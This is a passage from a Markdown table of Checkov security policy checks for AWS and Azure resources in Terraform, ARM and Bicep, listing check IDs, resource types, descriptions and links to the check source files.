[ElasticSearchDedicatedMasterEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElasticSearchDedicatedMasterEnabled.yaml) | -| 1501 | CKV2_AWS_60 | resource | aws_db_instance | Ensure RDS instance with copy tags to snapshots is enabled | Terraform | [RDSEnableCopyTagsToSnapshot.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSEnableCopyTagsToSnapshot.yaml) | -| 1502 | CKV2_AWS_61 | resource | aws_s3_bucket | Ensure that an S3 bucket has a lifecycle configuration | Terraform | [S3BucketLifecycle.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketLifecycle.yaml) | -| 1503 | CKV2_AWS_62 | resource | aws_s3_bucket | Ensure S3 buckets should have event notifications enabled | Terraform | [S3BucketEventNotifications.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEventNotifications.yaml) | -| 1504 | CKV2_AWS_63 | resource | aws_networkfirewall_firewall | Ensure Network firewall has logging configuration defined | Terraform | [NetworkFirewallHasLogging.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/NetworkFirewallHasLogging.yaml) | -| 1505 | CKV2_AWS_64 | resource | aws_kms_key | Ensure KMS key Policy is defined | Terraform | [KmsKeyPolicyIsDefined.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/KmsKeyPolicyIsDefined.yaml) | -| 1506 | CKV2_AWS_65 | resource | aws_s3_bucket_ownership_controls | Ensure access control lists for S3 buckets are disabled | Terraform | [AWSdisableS3ACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSdisableS3ACL.yaml) | -| 1507 | CKV2_AWS_66 | resource | aws_mwaa_environment | Ensure MWAA environment is not publicly accessible | Terraform | [AWS_private_MWAA_environment.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWS_private_MWAA_environment.yaml) | -| 1508 | CKV_AZURE_1 | resource | Microsoft.Compute/virtualMachines | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | arm | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstancePassword.py) | -| 1509 | CKV_AZURE_1 | resource | Microsoft.Compute/virtualMachines | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Bicep | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstancePassword.py) | -| 1510 | CKV_AZURE_1 | resource | azurerm_linux_virtual_machine | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstancePassword.py) | -| 1511 | CKV_AZURE_1 | resource | azurerm_virtual_machine | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstancePassword.py) | -| 1512 | CKV_AZURE_2 | resource | Microsoft.Compute/disks | Ensure Azure managed disk have encryption enabled | arm | [AzureManagedDiscEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiscEncryption.py) | -| 1513 | CKV_AZURE_2 | resource | Microsoft.Compute/disks | Ensure Azure managed disk have encryption enabled | Bicep | [AzureManagedDiscEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiscEncryption.py) | -| 1514 | CKV_AZURE_2 | resource | azurerm_managed_disk | Ensure Azure managed disk has encryption enabled | Terraform | [AzureManagedDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryption.py) | -| 1515 | CKV_AZURE_3 | resource | Microsoft.Storage/storageAccounts | Ensure that 'supportsHttpsTrafficOnly' is set to 'true' | arm | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountsTransportEncryption.py) | -| 1516 | CKV_AZURE_3 | resource | Microsoft.Storage/storageAccounts | Ensure that 'supportsHttpsTrafficOnly' is set to 'true' | Bicep | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountsTransportEncryption.py) | -| 1517 | CKV_AZURE_3 | resource | azurerm_storage_account | Ensure that 'enable_https_traffic_only' is enabled | Terraform | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountsTransportEncryption.py) | -| 1518 | CKV_AZURE_4 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS logging to Azure Monitoring is Configured | arm | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLoggingEnabled.py) | -| 1519 | CKV_AZURE_4 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS logging to Azure Monitoring is Configured | Bicep | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLoggingEnabled.py) | -| 1520 | CKV_AZURE_4 | resource | azurerm_kubernetes_cluster | Ensure AKS logging to Azure Monitoring is Configured | Terraform | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSLoggingEnabled.py) | -| 1521 | CKV_AZURE_5 | resource | Microsoft.ContainerService/managedClusters | Ensure RBAC is enabled on AKS clusters | arm | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSRbacEnabled.py) | -| 1522 | CKV_AZURE_5 | resource | Microsoft.ContainerService/managedClusters | Ensure RBAC is enabled on AKS clusters | Bicep | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSRbacEnabled.py) | -| 1523 | CKV_AZURE_5 | resource | azurerm_kubernetes_cluster | Ensure RBAC is enabled on AKS clusters | Terraform | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSRbacEnabled.py) | -| 1524 | CKV_AZURE_6 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS has an API Server Authorized IP Ranges enabled | arm | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py) | -| 1525 | CKV_AZURE_6 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS has an API Server Authorized IP Ranges enabled | Bicep | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py) | -| 1526 | CKV_AZURE_6 | resource | azurerm_kubernetes_cluster | Ensure AKS has an API Server Authorized IP Ranges enabled | Terraform | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSApiServerAuthorizedIpRanges.py) | -| 1527 | CKV_AZURE_7 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS cluster has Network Policy configured | arm | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSNetworkPolicy.py) | -| 1528 | CKV_AZURE_7 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS cluster has Network Policy configured | Bicep | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSNetworkPolicy.py) | -| 1529 | CKV_AZURE_7 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster has Network Policy configured | Terraform | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSNetworkPolicy.py) | -| 1530 | CKV_AZURE_8 | resource | Microsoft.ContainerService/managedClusters | Ensure Kubernetes Dashboard is disabled | arm | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSDashboardDisabled.py) | -| 1531 | CKV_AZURE_8 | resource | Microsoft.ContainerService/managedClusters | Ensure Kubernetes Dashboard is disabled | Bicep | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSDashboardDisabled.py) | -| 1532 | CKV_AZURE_8 | resource | azurerm_kubernetes_cluster | Ensure Kubernetes Dashboard is disabled | Terraform | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSDashboardDisabled.py) | -| 1533 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups | Ensure that RDP access is restricted from the internet | arm | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | -| 1534 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups | Ensure that RDP access is restricted from the internet | Bicep | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | -| 1535 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that RDP access is restricted from the internet | arm | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | -| 1536 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that RDP access is restricted from the internet | Bicep | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | -| 1537 | CKV_AZURE_9 | resource | azurerm_network_security_group | Ensure that RDP access is restricted from the internet | Terraform | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py) | -| 1538 | CKV_AZURE_9 | resource | azurerm_network_security_rule | Ensure that RDP access is restricted from the internet | Terraform | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py) | -| 1539 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups | Ensure that SSH access is restricted from the internet | arm | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | -| 1540 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups | Ensure that SSH access is restricted from the internet | Bicep | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | -| 1541 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that SSH access is restricted from the internet | arm | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | -| 1542 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that SSH access is restricted from the internet | Bicep | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | -| 1543 | CKV_AZURE_10 | resource | azurerm_network_security_group | Ensure that SSH access is restricted from the internet | Terraform | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleSSHAccessRestricted.py) | -| 1544 | CKV_AZURE_10 | resource | azurerm_network_security_rule | Ensure that SSH access is restricted from the internet | Terraform | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleSSHAccessRestricted.py) | -| 1545 | CKV_AZURE_11 | resource | Microsoft.Sql/servers | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | arm | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerNoPublicAccess.py) | -| 1546 | CKV_AZURE_11 | resource | Microsoft.Sql/servers | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Bicep | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerNoPublicAccess.py) | -| 1547 | CKV_AZURE_11 | resource | azurerm_mariadb_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | -| 1548 | CKV_AZURE_11 | resource | azurerm_mysql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | -| 1549 | CKV_AZURE_11 | resource | azurerm_postgresql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | -| 1550 | CKV_AZURE_11 | resource | azurerm_sql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | -| 1551 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 1552 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 1553 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 1554 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 1555 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 1556 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 1557 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 1558 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 1559 | CKV_AZURE_12 | resource | azurerm_network_watcher_flow_log | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Terraform | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NetworkWatcherFlowLogPeriod.py) | -| 1560 | CKV_AZURE_13 | resource | Microsoft.Web/sites/config | Ensure App Service Authentication is set on Azure App Service | arm | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | -| 1561 | CKV_AZURE_13 | resource | Microsoft.Web/sites/config | Ensure App Service Authentication is set on Azure App Service | Bicep | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | -| 1562 | CKV_AZURE_13 | resource | azurerm_app_service | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) | -| 1563 | CKV_AZURE_13 | resource | azurerm_linux_web_app | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) | -| 1564 | CKV_AZURE_13 | resource | azurerm_windows_web_app | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) | -| 1565 | CKV_AZURE_13 | resource | config | Ensure App Service Authentication is set on Azure App Service | arm | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | -| 1566 | CKV_AZURE_13 | resource | config | Ensure App Service Authentication is set on Azure App Service | Bicep | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | -| 1567 | CKV_AZURE_14 | resource | Microsoft.Web/sites | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | arm | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHTTPSOnly.py) | -| 1568 | CKV_AZURE_14 | resource | Microsoft.Web/sites | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Bicep | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHTTPSOnly.py) | -| 1569 | CKV_AZURE_14 | resource | azurerm_app_service | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) | -| 1570 | CKV_AZURE_14 | resource | azurerm_linux_web_app | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) | -| 1571 | CKV_AZURE_14 | resource | azurerm_windows_web_app | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) | -| 1572 | CKV_AZURE_15 | resource | Microsoft.Web/sites | Ensure web app is using the latest version of TLS encryption | arm | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceMinTLSVersion.py) | -| 1573 | CKV_AZURE_15 | resource | Microsoft.Web/sites | Ensure web app is using the latest version of TLS encryption | Bicep | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceMinTLSVersion.py) | -| 1574 | CKV_AZURE_15 | resource | azurerm_app_service | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) | -| 1575 | CKV_AZURE_15 | resource | azurerm_linux_web_app | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) | -| 1576 | CKV_AZURE_15 | resource | azurerm_windows_web_app | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) | -| 1577 | CKV_AZURE_16 | resource | Microsoft.Web/sites | Ensure that Register with Azure Active Directory is enabled on App Service | arm | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentity.py) | -| 1578 | CKV_AZURE_16 | resource | Microsoft.Web/sites | Ensure that Register with Azure Active Directory is enabled on App Service | Bicep | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentity.py) | -| 1579 | CKV_AZURE_16 | resource | azurerm_app_service | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) | -| 1580 | CKV_AZURE_16 | resource | azurerm_linux_web_app | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) | -| 1581 | CKV_AZURE_16 | resource | azurerm_windows_web_app | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) | -| 1582 | CKV_AZURE_17 | resource | Microsoft.Web/sites | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | arm | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceClientCertificate.py) | -| 1583 | CKV_AZURE_17 | resource | Microsoft.Web/sites | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Bicep | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceClientCertificate.py) | -| 1584 | CKV_AZURE_17 | resource | azurerm_app_service | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) | -| 1585 | CKV_AZURE_17 | resource | azurerm_linux_web_app | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) | -| 1586 | CKV_AZURE_17 | resource | azurerm_windows_web_app | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) | -| 1587 | CKV_AZURE_18 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest if used to run the web app | arm | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttps20Enabled.py) | -| 1588 | CKV_AZURE_18 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest if used to run the web app | Bicep | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttps20Enabled.py) | -| 1589 | CKV_AZURE_18 | resource | azurerm_app_service | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) | -| 1590 | CKV_AZURE_18 | resource | azurerm_linux_web_app | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) | -| 1591 | CKV_AZURE_18 | resource | azurerm_windows_web_app | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) | -| 1592 | CKV_AZURE_19 | resource | Microsoft.Security/pricings | Ensure that standard pricing tier is selected | arm | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterStandardPricing.py) | -| 1593 | CKV_AZURE_19 | resource | Microsoft.Security/pricings | Ensure that standard pricing tier is selected | Bicep | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterStandardPricing.py) | -| 1594 | CKV_AZURE_19 | resource | azurerm_security_center_subscription_pricing | Ensure that standard pricing tier is selected | Terraform | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterStandardPricing.py) | -| 1595 | CKV_AZURE_20 | resource | Microsoft.Security/securityContacts | Ensure that security contact 'Phone number' is set | arm | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactPhone.py) | -| 1596 | CKV_AZURE_20 | resource | Microsoft.Security/securityContacts | Ensure that security contact 'Phone number' is set | Bicep | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactPhone.py) | -| 1597 | CKV_AZURE_20 | resource | azurerm_security_center_contact | Ensure that security contact 'Phone number' is set | Terraform | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactPhone.py) | -| 1598 | CKV_AZURE_21 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | arm | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlert.py) | -| 1599 | CKV_AZURE_21 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Bicep | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlert.py) | -| 1600 | CKV_AZURE_21 | resource | azurerm_security_center_contact | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Terraform | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlert.py) | -| 1601 | CKV_AZURE_22 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | arm | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlertAdmins.py) | -| 1602 | CKV_AZURE_22 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Bicep | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlertAdmins.py) | -| 1603 | CKV_AZURE_22 | resource | azurerm_security_center_contact | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Terraform | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlertAdmins.py) | -| 1604 | CKV_AZURE_23 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' is set to 'Enabled' for SQL servers | arm | [SQLServerAuditingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingEnabled.py) | -| 1605 | CKV_AZURE_23 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | -| 1606 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/auditingSettings | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | -| 1607 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases | Ensure that 'Auditing' is set to 'Enabled' for SQL servers | arm | [SQLServerAuditingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingEnabled.py) | -| 1608 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | 